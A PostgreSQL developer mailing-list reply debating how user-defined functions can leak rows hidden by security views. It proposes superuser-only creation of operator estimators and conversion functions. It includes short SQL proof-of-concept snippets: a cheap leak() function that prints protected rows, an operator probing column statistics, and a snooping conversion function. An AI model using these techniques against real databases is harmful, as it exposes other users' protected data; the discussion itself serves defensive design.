(2010/10/14 1:52), Tom Lane wrote:
> Robert Haas <robertmh...@gmail.com> writes:
>> On Wed, Oct 13, 2010 at 11:45 AM, Tom Lane <t...@sss.pgh.pa.us> wrote:
>>> That's all true, but you have to consider how much the obstacle actually
>>> gets in their way versus how painful it is on your end to create and
>>> maintain the obstacle.  I don't think this proposed patch measures up
>>> very well on either end of that tradeoff.

>> I think it would behoove us to try to separate concerns about this
>> particular patch from concerns about the viability of the whole
>> approach.  Whether or not it's useful to do X is a different question
>> than whether it can be done with few enough lines of code and/or
>> whether this patch actually does it well.

> I think I left the wrong impression: I'm concerned about the whole
> approach.  I haven't even read this particular patch lately.  I think
> that trying to guarantee that the planner applies independent
> constraints in a particular order will be expensive, fragile, and prone
> to recurring security bugs no matter how it's implemented --- unless you
> do it by lobotomizing query pullup/pushdown, which seems unacceptable
> from a performance standpoint.
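
To make the ordering problem concrete, the usual illustration (with
made-up table, view and function names) looks like this:

    -- a view that is supposed to hide other users' rows
    CREATE VIEW my_accounts AS
        SELECT * FROM accounts WHERE owner = current_user;

    -- an attacker-supplied function that reports whatever it is given
    CREATE FUNCTION leak(numeric) RETURNS bool
        LANGUAGE plpgsql COST 0.0000001 AS
        $$ BEGIN RAISE NOTICE 'leak: %', $1; RETURN true; END; $$;

    SELECT * FROM my_accounts WHERE leak(balance);

Once the view is pulled up, the planner is free to order the quals by
estimated cost, so the cheap leak() can be evaluated ahead of the
owner = current_user check and see rows the view was meant to hide.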

> Just to give one example of what this patch misses (probably; as I said
> I haven't read it lately), what about selectivity estimation?  One of
> the things we like to do when we have an otherwise-unknown function is
> to try it on all the histogram members and see what percentage yield
> true.  That might already represent enough of an information leak to be
> objectionable ... and yet, if we don't do it, the consequences for
> performance could be pretty horrid because we'll have to work without
> any reasonable selectivity estimate at all.  There are cases where this
> technique isn't applied at the moment but probably should be, which is
> why I characterize the leak-prevention idea as creating future security
> issues: doing that is a constraint that will have to be accounted for in
> every future planner change, and we are certain to miss the implications
> sometimes.
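
The statistics probe can be sketched the same way (again with
hypothetical names; whether the probe actually fires depends on the
operator's estimator and on what statistics exist for the column):

    CREATE FUNCTION leaky_eq(text, text) RETURNS bool
        LANGUAGE plpgsql COST 0.0000001 AS
        $$ BEGIN RAISE NOTICE 'saw % / %', $1, $2; RETURN $1 = $2; END; $$;

    CREATE OPERATOR === (
        LEFTARG = text, RIGHTARG = text,
        PROCEDURE = leaky_eq,
        RESTRICT = eqsel, JOIN = eqjoinsel
    );

    -- Merely planning
    --   SELECT * FROM protected_view WHERE col === 'constant';
    -- can make eqsel run leaky_eq against the stored statistics of col,
    -- and the NOTICEs disclose sampled values of the underlying table.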

Sorry if I have misread what you pointed out.

Do you see the internal invocation of oprrest/oprjoin as the problem?
I also think it is a problem as long as they can be installed by
non-superusers, but it is a separate problem from the row-level
security issues.

In my opinion, the root of the matter is the inadequate permission
check at operator creation time. It allows a non-superuser to define
a new operator with restriction and join estimators as long as he has
EXECUTE privilege on those functions (not the EXECUTE privilege of the
user who actually invokes them during the estimation phase!).
The optimizer may then invoke these functions internally without any
privilege check on either the function or the table being estimated.
So, if a malicious user wants to get other users to run a trojan
horse, he can simply define a booby-trapped operator with malicious
estimator functions, can't he?
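
In SQL terms, the check at creation time amounts to no more than this
(my_match, my_restsel and my_joinsel are hypothetical functions on
which the creator merely has EXECUTE privilege):

    CREATE OPERATOR ~~~ (
        LEFTARG   = text,
        RIGHTARG  = text,
        PROCEDURE = my_match,      -- ordinary comparison function
        RESTRICT  = my_restsel,    -- restriction estimator
        JOIN      = my_joinsel     -- join estimator
    );

    -- From then on the planner calls my_restsel/my_joinsel whenever it
    -- estimates a qual or join over ~~~, in whatever session plans the
    -- query, without re-checking that user's privileges on the
    -- functions or on the table whose statistics are being examined.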

I think this is a case where we should require superuser privilege,
which asserts that the specified functions have no malicious intent;
it is comparable to the privilege needed to GRANT EXECUTE on them to
PUBLIC.

There is a similar problem with conversion functions.
If a malicious user wanted to install a fake conversion function that
records the entire stream between server and client, that does not
seem impossible to me.
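
For instance (conv_snoop here is a hypothetical C-language conversion
function that copies every byte it is handed before converting it):

    CREATE DEFAULT CONVERSION snoop_conv
        FOR 'UTF8' TO 'LATIN1' FROM conv_snoop;

    -- Creating this requires only EXECUTE privilege on conv_snoop and
    -- CREATE privilege on the schema; if it is the conversion picked
    -- up for that encoding pair, the whole client/server stream passes
    -- through conv_snoop.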

So I would like to suggest revising the permission checks on these
commands. If we can ensure that these functions are not malicious,
there is no need to worry about information leaks through untrusted
functions that are invoked internally.

Thanks,
--
KaiGai Kohei <kai...@ak.jp.nec.com>

